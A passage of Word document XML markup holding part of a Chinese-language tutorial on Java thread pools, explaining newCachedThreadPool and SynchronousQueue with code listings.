          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>            (</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> ThreadPoolExecutor(</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>,  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>                                    0L, TimeUnit.MILLISECONDS,  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>                                    </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> LinkedBlockingQueue&lt;Runnable&gt;()));  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="005B41AA" w:rsidRDefault="008632FA" w:rsidP="005B41AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="00A32D7A" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="008632FA" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ExecutorService newCachedThreadPool()</w:t>
      </w:r>
      <w:r w:rsidR="008632FA" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>：无界线程池，可以进行自动线程回收。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="005B41AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>首先是无界的线程池，所以我们可以发现</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>big big</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。其次</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的选择上使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SynchronousQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。可能对于该</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>有些陌生，简单说：该</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>QUEUE</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中，每个插入操作必须等待另一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>线程的对应移除操作。比如，我先添加一个元素，接下来如果继续想尝试添加则会阻塞，直到另一个线程取走一个元素，反之亦然。（想到什么？就是缓冲区为</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的生产者消费者模式</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>^_^</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>注意到介绍中的自动回收线程的特性吗，为什么呢？先不说，但注意到该实现中</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的大小不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="108AC6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="135255"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="230" name="图片 5" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="135255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> ExecutorService newCachedThreadPool() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
